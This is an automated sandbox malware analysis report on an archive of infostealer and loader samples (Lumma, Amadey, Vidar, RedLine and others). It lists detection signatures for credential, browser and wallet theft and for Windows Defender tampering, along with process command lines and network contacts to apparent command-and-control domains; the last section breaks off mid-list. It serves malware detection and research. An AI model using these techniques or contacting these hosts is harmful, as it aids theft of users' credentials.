Malware Analysis Report

2025-04-03 09:12

Sample ID 250226-3r6zssyks3
Target quarantine.7z
SHA256 1824be1799f0c32c14c5fcb3c5d34c98b9fb4d2b867067b8ddc3d129783812fe
Tags
discovery spyware stealer amadey lumma systembc vidar 092155 a4d2cd ir7am credential_access defense_evasion execution persistence privilege_escalation trojan redline testproliv infostealer healer dropper evasion gcleaner loader stealc reno
score
10/10

Table of Contents

Analysis Overview

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Signatures

Analysis: behavioral4

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral10

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral13

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral19

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral23

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral1

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral16

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral17

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral21

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral2

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral7

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral8

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral27

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral6

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral9

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral12

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral18

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral28

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral30

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral22

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral24

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral25

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral3

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral5

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral20

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral11

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral14

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral15

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral26

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis: behavioral29

Detonation Overview

Command Line

Signatures

Processes

Network

Files

Analysis Overview

score
10/10

SHA256

1824be1799f0c32c14c5fcb3c5d34c98b9fb4d2b867067b8ddc3d129783812fe

Threat Level: Known bad

The file quarantine.7z was found to be: Known bad.

Malicious Activity Summary

discovery spyware stealer amadey lumma systembc vidar 092155 a4d2cd ir7am credential_access defense_evasion execution persistence privilege_escalation trojan redline testproliv infostealer healer dropper evasion gcleaner loader stealc reno

Amadey family

Vidar family

Lumma Stealer, LummaC

Vidar

Healer

RedLine payload

Healer family

GCleaner

Modifies Windows Defender DisableAntiSpyware settings

Detect Vidar Stealer

Modifies Windows Defender notification settings

Systembc family

Lumma family

Redline family

Stealc family

Modifies Windows Defender Real-time Protection settings

Amadey

RedLine

Gcleaner family

Modifies Windows Defender TamperProtection settings

SystemBC

Detects Healer an antivirus disabler dropper

Stealc

Identifies VirtualBox via ACPI registry values (likely anti-VM)

Blocklisted process makes network request

Uses browser remote debugging

Command and Scripting Interpreter: PowerShell

Command and Scripting Interpreter: PowerShell

Downloads MZ/PE file

Sets service image path in registry

Reads user/profile data of web browsers

Checks computer location settings

Unsecured Credentials: Credentials In Files

Reads data files stored by FTP clients

Checks BIOS information in registry

Event Triggered Execution: Component Object Model Hijacking

Windows security modification

Loads dropped DLL

Identifies Wine through registry keys

Executes dropped EXE

Reads user/profile data of local email clients

Checks installed software on the system

Enumerates connected drives

Legitimate hosting services abused for malware hosting/C2

Accesses cryptocurrency files/wallets, possible credential harvesting

Adds Run key to start application

Drops file in System32 directory

Suspicious use of SetThreadContext

Suspicious use of NtSetInformationThreadHideFromDebugger

Boot or Logon Autostart Execution: Authentication Package

AutoIT Executable

Drops file in Program Files directory

Drops file in Windows directory

Program crash

Browser Information Discovery

Enumerates physical storage devices

System Location Discovery: System Language Discovery

Unsigned PE

Delays execution with timeout.exe

Scheduled Task/Job: Scheduled Task

Suspicious behavior: EnumeratesProcesses

Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary

Suspicious use of FindShellTrayWindow

Enumerates system info in registry

Modifies Internet Explorer settings

Suspicious use of AdjustPrivilegeToken

Checks processor information in registry

Suspicious use of SendNotifyMessage

Uses Task Scheduler COM API

Suspicious use of WriteProcessMemory

Modifies data under HKEY_USERS

Checks SCSI registry key(s)

Suspicious use of SetWindowsHookEx

Kills process with taskkill

Modifies system certificate store

Modifies registry class

Uses Volume Shadow Copy service COM API

MITRE ATT&CK

Enterprise Matrix V15

Analysis: static1

Detonation Overview

Reported

2025-02-26 23:45

Signatures

AutoIT Executable

Description Indicator Process Target
N/A N/A N/A N/A

Unsigned PE

Description Indicator Process Target
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A
N/A N/A N/A N/A

Analysis: behavioral4

Detonation Overview

Submitted

2025-02-26 23:45

Reported

2025-02-26 23:48

Platform

win10v2004-20250217-en

Max time kernel

127s

Max time network

139s

Command Line

"C:\Users\Admin\AppData\Local\Temp\quarantine\7axE6Jz.exe"

Signatures

Reads user/profile data of local email clients

spyware stealer

Checks installed software on the system

discovery

Suspicious use of SetThreadContext

Description Indicator Process Target
PID 4056 set thread context of 2128 N/A C:\Users\Admin\AppData\Local\Temp\quarantine\7axE6Jz.exe C:\Users\Admin\AppData\Local\Temp\quarantine\7axE6Jz.exe

System Location Discovery: System Language Discovery

discovery
Description Indicator Process Target
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\quarantine\7axE6Jz.exe N/A
Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language C:\Users\Admin\AppData\Local\Temp\quarantine\7axE6Jz.exe N/A

Processes

C:\Users\Admin\AppData\Local\Temp\quarantine\7axE6Jz.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\7axE6Jz.exe"

C:\Users\Admin\AppData\Local\Temp\quarantine\7axE6Jz.exe

"C:\Users\Admin\AppData\Local\Temp\quarantine\7axE6Jz.exe"

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -pss -s 408 -p 4056 -ip 4056

C:\Windows\SysWOW64\WerFault.exe

C:\Windows\SysWOW64\WerFault.exe -u -p 4056 -s 788

Network

Country Destination Domain Proto
US 8.8.8.8:53 privileggoe.live udp
US 8.8.8.8:53 foresctwhispers.top udp
US 104.21.48.1:443 foresctwhispers.top tcp
US 8.8.8.8:53 tracnquilforest.life udp
US 104.21.74.230:443 tracnquilforest.life tcp
US 8.8.8.8:53 g.bing.com udp
US 150.171.28.10:443 g.bing.com tcp
US 8.8.8.8:53 presentymusse.world udp
US 8.8.8.8:53 deaddereaste.today udp
US 8.8.8.8:53 subawhipnator.life udp
US 8.8.8.8:53 boltetuurked.digital udp
US 8.8.8.8:53 pastedeputten.life udp
US 8.8.8.8:53 steamcommunity.com udp
FR 2.18.131.137:443 steamcommunity.com tcp
US 8.8.8.8:53 disobilittyhell.live udp
US 172.67.137.158:443 disobilittyhell.live tcp
US 172.67.137.158:443 disobilittyhell.live tcp
US 172.67.137.158:443 disobilittyhell.live tcp
US 8.8.8.8:53 tse1.mm.bing.net udp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp
US 150.171.27.10:443 tse1.mm.bing.net tcp

Files

memory/4056-0-0x0000000074D0E000-0x0000000074D0F000-memory.dmp

memory/4056-1-0x00000000006F0000-0x0000000000758000-memory.dmp

memory/4056-2-0x0000000005630000-0x0000000005BD4000-memory.dmp

memory/2128-6-0x0000000000400000-0x000000000045E000-memory.dmp

memory/2128-4-0x0000000000400000-0x000000000045E000-memory.dmp

memory/4056-7-0x0000000074D00000-0x00000000754B0000-memory.dmp

memory/2128-8-0x0000000000400000-0x000000000045E000-memory.dmp

memory/2128-9-0x0000000000400000-0x000000000045E000-memory.dmp

Analysis: behavioral10

Detonation Overview

Submitted

2025-02-26 23:45

Reported

2025-02-26 23:48

Platform

win10v2004-20250217-en

Max time kernel

145s

Max time network

139s

Command Line

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument C:\Users\Admin\AppData\Local\Temp\quarantine\I8L5Xon.html

Signatures

Browser Information Discovery

discovery

Enumerates system info in registry

Description Indicator Process Target
Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of FindShellTrayWindow

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of SendNotifyMessage

Description Indicator Process Target
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A
N/A N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 404 wrote to memory of 3416 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 404 wrote to memory of 3416 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 404 wrote to memory of 2992 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 404 wrote to memory of 2992 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 404 wrote to memory of 2992 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 404 wrote to memory of 2992 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 404 wrote to memory of 2992 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 404 wrote to memory of 2992 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 404 wrote to memory of 2992 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 404 wrote to memory of 2992 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 404 wrote to memory of 2992 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 404 wrote to memory of 2992 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 404 wrote to memory of 2992 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 404 wrote to memory of 2992 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 404 wrote to memory of 2992 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 404 wrote to memory of 2992 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 404 wrote to memory of 2992 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 404 wrote to memory of 2992 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 404 wrote to memory of 2992 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 404 wrote to memory of 2992 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 404 wrote to memory of 2992 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 404 wrote to memory of 2992 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 404 wrote to memory of 2992 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 404 wrote to memory of 2992 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 404 wrote to memory of 2992 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 404 wrote to memory of 2992 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 404 wrote to memory of 2992 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 404 wrote to memory of 2992 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 404 wrote to memory of 2992 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 404 wrote to memory of 2992 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 404 wrote to memory of 2992 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 404 wrote to memory of 2992 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 404 wrote to memory of 2992 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 404 wrote to memory of 2992 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 404 wrote to memory of 2992 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 404 wrote to memory of 2992 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 404 wrote to memory of 2992 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 404 wrote to memory of 2992 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 404 wrote to memory of 2992 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 404 wrote to memory of 2992 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 404 wrote to memory of 2992 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 404 wrote to memory of 2992 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 404 wrote to memory of 4132 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 404 wrote to memory of 4132 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 404 wrote to memory of 2160 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 404 wrote to memory of 2160 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 404 wrote to memory of 2160 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 404 wrote to memory of 2160 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 404 wrote to memory of 2160 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 404 wrote to memory of 2160 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 404 wrote to memory of 2160 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 404 wrote to memory of 2160 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 404 wrote to memory of 2160 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 404 wrote to memory of 2160 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 404 wrote to memory of 2160 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 404 wrote to memory of 2160 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 404 wrote to memory of 2160 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 404 wrote to memory of 2160 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 404 wrote to memory of 2160 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 404 wrote to memory of 2160 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 404 wrote to memory of 2160 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 404 wrote to memory of 2160 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 404 wrote to memory of 2160 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
PID 404 wrote to memory of 2160 N/A C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

Processes

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument C:\Users\Admin\AppData\Local\Temp\quarantine\I8L5Xon.html

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:7 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" "--metrics-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=92.0.4515.131 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 "--annotation=prod=Microsoft Edge" --annotation=ver=92.0.902.67 --initial-client-data=0xfc,0x100,0x104,0xd8,0x108,0x7ffe558d46f8,0x7ffe558d4708,0x7ffe558d4718

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --field-trial-handle=2164,3913451632578492030,17860219987844110835,131072 --gpu-preferences=UAAAAAAAAADgAAAQAAAAAAAAAAAAAAAAAABgAAAAAAAwAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAHgAAAAAAAAAeAAAAAAAAAAoAAAABAAAACAAAAAAAAAAKAAAAAAAAAAwAAAAAAAAADgAAAAAAAAAEAAAAAAAAAAAAAAADQAAABAAAAAAAAAAAQAAAA0AAAAQAAAAAAAAAAQAAAANAAAAEAAAAAAAAAAHAAAADQAAAAgAAAAAAAAACAAAAAAAAAA= --mojo-platform-channel-handle=2204 /prefetch:2

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --field-trial-handle=2164,3913451632578492030,17860219987844110835,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=2288 /prefetch:3

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --field-trial-handle=2164,3913451632578492030,17860219987844110835,131072 --lang=en-US --service-sandbox-type=utility --mojo-platform-channel-handle=2760 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,3913451632578492030,17860219987844110835,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3192 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,3913451632578492030,17860219987844110835,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=3212 /prefetch:1

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Windows\System32\CompPkgSrv.exe

C:\Windows\System32\CompPkgSrv.exe -Embedding

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2164,3913451632578492030,17860219987844110835,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5124 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\92.0.902.67\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --field-trial-handle=2164,3913451632578492030,17860219987844110835,131072 --lang=en-US --service-sandbox-type=none --mojo-platform-channel-handle=5124 /prefetch:8

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,3913451632578492030,17860219987844110835,131072 --lang=en-US --disable-client-side-phishing-detection --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=4128 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

"C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --field-trial-handle=2164,3913451632578492030,17860219987844110835,131072 --lang=en-US --disable-client-side-phishing-detection --instant-process --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --no-v8-untrusted-code-mitigations --mojo-platform-channel-handle=5116 /prefetch:1

C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe

